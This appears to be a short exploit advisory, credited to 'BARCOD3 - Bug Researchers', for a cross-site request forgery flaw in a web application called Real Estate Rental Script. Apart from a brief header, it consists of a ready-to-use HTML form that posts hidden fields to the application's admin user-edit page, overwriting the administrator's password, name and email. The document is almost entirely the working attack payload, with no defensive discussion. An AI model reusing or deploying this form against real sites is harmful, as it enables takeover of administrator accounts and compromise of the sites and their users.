< ------------------- header data start ------------------- >

#############################################################

# Application Name : Real Estate Rental Script

# vulnerable Type : XSRF

# Infection : Admin pass Change Edilebilir.

# Demo : http://www.easyestaterental.net/demo/

# author : BARCOD3 - Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=form method=post action=http://www.easyestaterental.net/demo/us/admin/system_user_edit.php>
<input name=user_id type=hidden value=1/>
<input type=hidden name=user_password value=passWORD class=textbox id=box_user_password/>
<input type=hidden name=user_firstname value=FIRSTNAME class=textbox id=box_user_firstname/>
<input type=hidden name=user_lastname value=LASTNAME class=textbox/>
<input type=hidden name=user_email value=[email protected] class=textbox/>
<option value=full selected>
<input type=submit name=smt_adduser value=Save />
</form>

< -- bug code end of -- >